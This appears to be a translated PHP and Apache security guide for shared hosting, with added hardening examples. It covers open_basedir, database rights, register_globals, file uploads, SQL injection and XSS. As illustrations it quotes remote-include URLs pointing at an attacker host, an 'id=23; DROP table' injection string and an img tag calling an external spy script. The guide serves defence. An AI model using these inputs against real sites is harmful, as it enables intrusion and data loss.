Installing the server
Multi-host server configuration

Let me say right away that PHP and Apache are far from ideal in this area. A normal multi-user web server configuration runs sites under different users: each user has their own account on the system, logs in under it via FTP, uploads files with permissions 0700, and only that user can operate on their files on the web server. This is what suExec is for, and suExec, unfortunately, is not supported by Apache when PHP runs as a module. That setup works only for CGI.
There are several different solutions to this problem:
- Set up an elaborate user/group scheme whose essence is that all users belong to the one group under which Apache runs. For example, there is a group "www" which includes the users "nobody", "pupkin" and "jsmith". In httpd.conf the directives are
    ...
    User nobody
    Group www
    ...
Accordingly, users are configured to upload files with permissions 640. If they want to edit files not only via FTP but also via a script, they set 0660.
In any case, this scheme lets a user read the contents of other users' files, and sometimes (with 0660) even change them.
- The same scheme, but with safe_mode = On. Reliable, but a buggy configuration. If users pupkin and jsmith have not pestered the root user within a week, it means they do not use the file functions. But as soon as they decide to add something like file uploads to their site, the server admin's life gets no easier. All because this directive is incompatible with Apache's suExec mechanism. When working with files, it checks whether the owner of the file or directory is the same as the Apache user. And since user nobody (Apache) and pupkin (owner of the files) are quite different, pupkin will get nowhere when trying move_uploaded_file(), fopen(), gzopen() and so on.
- The same scheme, but with open_basedir set. The most common approach. This directive restricts the files PHP can open to the specified directory tree of the site. It works regardless of the safe_mode directive. When a script tries to open a file, for example via fopen or gzopen, the file path is checked. If the file is outside the specified tree, a warning is issued and the operation fails. Symlinks are resolved as well. The special value . means that the directory the script is run from is the base. To specify several values, separate them with a colon (under Windows, a semicolon). As an Apache module, open_basedir paths from parent directories are automatically inherited.
The value of open_basedir is actually a prefix, not a directory name. This means that "open_basedir = /dir/incl" also allows access to "/dir/include" and "/dir/incls" if they exist. If you want to restrict access to one specific directory, end the value with a slash: "open_basedir = /dir/incl/"
- Run several web servers under different users. Not a good solution: they have to sit on different ports, which is inconvenient. Besides, 3-5 servers will probably bog down even decent hardware.
- If you do not care at all about warnings of the sort
"Do not use Apache 2.0 and PHP in a production environment neither on Unix nor on Windows",
you can use an MPM (Multi Processing Module) that ships with Apache 2. Running Apache with "mpm_perchild_module", you can run virtual hosts under different users, which IMHO is the best option, especially in combination with safe_mode = On.
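The open_basedir prefix behaviour described above, as an added httpd.conf example (not from the original article): the weak form without a trailing slash beside the corrected one. PHP is assumed to run as an Apache module; host names and paths are assumed.

```apache
# Added example, not from the original article: open_basedir set per virtual
# host in httpd.conf (PHP as an Apache module). Host names and paths are assumed.
# The two blocks are shown side by side; keep only the corrected one.

# Weak: no trailing slash, so the value is a prefix. /home/pupkin/www2 and
# /home/pupkin/www-old would also be readable if they existed.
<VirtualHost *:80>
    ServerName pupkin.example.com
    DocumentRoot /home/pupkin/www
    php_admin_value open_basedir "/home/pupkin/www"
</VirtualHost>

# Corrected: every entry ends in a slash, so only that directory tree matches.
# php_admin_value (rather than php_value) means a .htaccess inside the site
# cannot relax the setting again.
<VirtualHost *:80>
    ServerName pupkin.example.com
    DocumentRoot /home/pupkin/www
    php_admin_value open_basedir "/home/pupkin/www/"
</VirtualHost>
```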
Setting up the database

For each project, create a database user that has rights only on its own database. For example, for Mr. Pupkin's site the MySQL user table should get the record:
    INSERT INTO user (Host, User, Password, Select_priv, Insert_priv, Update_priv, Delete_priv, Create_priv, Drop_priv, Reload_priv, Shutdown_priv, Process_priv, File_priv, Grant_priv, References_priv, Index_priv, Alter_priv)
    VALUES ('localhost', 'pupkin', 's0ac67a5', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N', 'N');
Think seven times before granting rights to '%' rather than 'localhost', and never, under any pretext, give users 'root' rights.
register_globals

A very important setting that affects not only performance but, first and foremost, the security of scripts. The point is that with register_globals = On all variables from EGPCS (environment, get, post, cookie, session) become available as ordinary variables, and if two variables have the same name, the value is taken from the leftmost source in the sequence EGPCS. The setting is changed in php.ini. A typical example is forging session data through GPC, for instance to break authorization.
Includes that take the file name from URL variables

It is a very bad programming practice to do this:
    index.php?showpage=news.php
    <?php $page = $_GET['showpage']; include($page); ?>
At best, a request such as index.php?showpage=bla_bla.php produces an error and shows some server details; at worst, it reads password files and the like and gives an attacker the ability to run their own scripts on your virtual host, with all the consequences. The latter threat lies in the attacker being able to include a remote file:
    index.php?showpage=ftp://ftp.haker.ru/evil-script.php
or
    index.php?showpage=http://haker.ru/evil-script.php
(Of course, evil-script.php must not be parsed by the haker.ru server; its contents are served as-is.)
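A hardened replacement for the include above, as an added example (not the article's own code): the request value is only ever used as a key into a fixed list, never as a path. The page keys, file names and the pages/ directory are assumptions.

```php
<?php
// Added example, not code from the original article: a hardened replacement
// for include($_GET['showpage']). Page keys, file names and the pages/
// directory are assumed.

// Every includable page is listed here. The request value is only ever used
// as an array key, never as a path, so "../../etc/passwd", "ftp://..." and
// "http://..." values simply miss the lookup.
const ALLOWED_PAGES = [
    'news'    => 'news.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

function resolve_page($requested): ?string
{
    if (!is_string($requested)) {          // ?showpage[]=x arrives as an array
        return null;
    }
    return ALLOWED_PAGES[$requested] ?? null;
}

$file = resolve_page($_GET['showpage'] ?? 'news');
if ($file === null) {
    http_response_code(404);
    exit('Unknown page');
}
// __DIR__ anchors the include to this script's own directory, independent
// of include_path and of allow_url_include.
include __DIR__ . '/pages/' . $file;
```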
Not checking file types on upload

If you let users upload certain files (e.g. photos) to the server's file system and do not check their extension, you will surely be hacked. It is enough to upload a script with the extension .php and then run it to get access to the whole site: scripts, the database and the ability to edit the content.
How to check: see here.
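One way to do the check, as an added example (not the article's own code). It goes beyond the extension check the text asks for: the file content is sniffed as well and the file is stored under a generated name. The form field "photo", UPLOAD_DIR and the allowed types are assumptions.

```php
<?php
// Added example, not code from the original article: checking an uploaded
// image before storing it. Goes beyond the extension check in the text: the
// content is sniffed too and the file is renamed on storage.
// The form field "photo" and UPLOAD_DIR are assumed.

const UPLOAD_DIR = '/home/pupkin/uploads';   // assumed; outside DocumentRoot
const ALLOWED_TYPES = ['jpg' => 'image/jpeg', 'png' => 'image/png', 'gif' => 'image/gif'];

function store_upload(array $file): string
{
    if (($file['error'] ?? -1) !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('upload failed');
    }
    // 1. Extension of the client-supplied name against a whitelist.
    //    "evil.php" and "evil.phtml" never get past this line.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!isset(ALLOWED_TYPES[$ext])) {
        throw new RuntimeException('file type not allowed');
    }
    // 2. The bytes must agree with the name: a PHP script renamed to .jpg
    //    is sniffed as text, not as image/jpeg.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    if ($finfo->file($file['tmp_name']) !== ALLOWED_TYPES[$ext]) {
        throw new RuntimeException('content does not match extension');
    }
    // 3. Store under a generated name, with the whitelisted extension, in a
    //    directory the web server does not execute scripts from.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    return $dest;
}

try {
    $stored = store_upload($_FILES['photo'] ?? []);
} catch (RuntimeException $e) {
    http_response_code(400);
    exit('Upload rejected: ' . $e->getMessage());
}
```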
Not checking user input

Everything that arrives via GET, POST and COOKIE must be checked and cast to the narrowest type, because nothing prevents a user from editing a POST form, adding something to the URL, editing a cookie or, for that matter, sending the request by telnet: in short, from sending you a Trojan horse.
The most common target of such attacks is SQL queries assembled from the user's input. In this example:
    file.php?id=23
    <?php $res = mysql_query("SELECT * FROM table WHERE id=" . $_GET['id']); ?>
nothing prevents the user from passing something other than 23 in ?id= or provoking an error. For example
    index.php?id=23; DROP table
deletes the table and, depending on the user's rights, can do a great deal more.
Always cast variables to the narrowest type:
    index.php?id=23; DROP table
    <?php $id = (int)$_GET['id']; if ($id < 1) { die('No ID specified'); } $res = mysql_query("SELECT * FROM table WHERE id=" . $id); ?>
outputs what was expected.
If the data must be a string, you can check it further: the length (maximum, minimum, empty string), the presence of disallowed characters (Latin letters, digits, Cyrillic), the correctness of URLs, addresses, e-mail.
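The casting and string checks above collected into reusable helpers, as an added example (not the article's own code): the integer cast from the text's own fix, plus length, allowed-character and e-mail validation. Field names and limits are assumptions.

```php
<?php
// Added example, not code from the original article: request parameters
// cast to the narrowest type, plus the string checks the text lists
// (length, allowed characters, e-mail). Field names and limits are assumed.

function require_id(array $src, string $key): int
{
    // (int) reduces "23; DROP table" to 23; anything below 1 is rejected,
    // exactly as in the text's own fix.
    $id = (int)($src[$key] ?? 0);
    if ($id < 1) {
        throw new InvalidArgumentException("No $key specified");
    }
    return $id;
}

function require_name(array $src, string $key, int $min = 1, int $max = 64): string
{
    $v = $src[$key] ?? '';
    if (!is_string($v)) {                       // ?name[]=x arrives as an array
        throw new InvalidArgumentException("$key must be a string");
    }
    $v = trim($v);
    $len = mb_strlen($v, 'UTF-8');
    if ($len < $min || $len > $max) {
        throw new InvalidArgumentException("$key length must be $min..$max");
    }
    // Latin and Cyrillic letters, digits, space, dot, apostrophe and hyphen only.
    if (!preg_match('/^[\p{Latin}\p{Cyrillic}0-9 .\'-]+$/u', $v)) {
        throw new InvalidArgumentException("$key contains disallowed characters");
    }
    return $v;
}

function require_email(array $src, string $key): string
{
    // filter_var returns false for arrays and for anything not shaped like an address.
    $v = filter_var($src[$key] ?? '', FILTER_VALIDATE_EMAIL);
    if ($v === false) {
        throw new InvalidArgumentException("$key is not a valid e-mail");
    }
    return $v;
}

// The text's query, now built only from an integer:
$sql = 'SELECT * FROM table WHERE id=' . require_id($_GET, 'id');
```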
Overloaded URLs

Pass the minimum of information through the URL:
    http://www.example.com/showuser.php?name=Pupkin&dept=13&cat=employee&show=full
is much better as
    http://www.example.com/showuser.php?id=176
HTML entered by visitors

If you let visitors enter any data that is later shown on the page (forum messages, chat, news, comments and so on), always run the user's input through htmlencode() before outputting it. Otherwise someone will always stuff in something like <img src="http://haker.ru/evil-spy.php"> or <iframe src=c:></iframe>.
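The htmlencode() step above is htmlspecialchars() in PHP. An added example (not the article's own code) applying it, with the flags that matter, to the two payloads quoted above and to an attribute value; the forum messages are constructed input.

```php
<?php
// Added example, not code from the original article: the "htmlencode" step
// the text asks for is htmlspecialchars() in PHP, wrapped here as h().

function h(?string $s): string
{
    // ENT_QUOTES also escapes ' so the value is safe inside any attribute;
    // ENT_SUBSTITUTE keeps malformed UTF-8 from silently yielding an empty string.
    return htmlspecialchars((string)$s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed forum messages, including the two payloads quoted in the text.
$posts = [
    'Hello <b>world</b>',
    '<img src="http://haker.ru/evil-spy.php">',
    '<iframe src=c:></iframe>',
];
foreach ($posts as $p) {
    echo '<li>' . h($p) . "</li>\n";   // rendered as visible text, not as markup
}

// The same call is needed when the value lands inside an attribute, e.g. a
// pre-filled reply form:
$name = $_GET['name'] ?? '';
echo '<input type="text" name="name" value="' . h(is_string($name) ? $name : '') . '">';
```

Encode at output time, for every place the stored text is printed; storing the raw text and encoding once on display keeps the data intact if it is later shown in a different context.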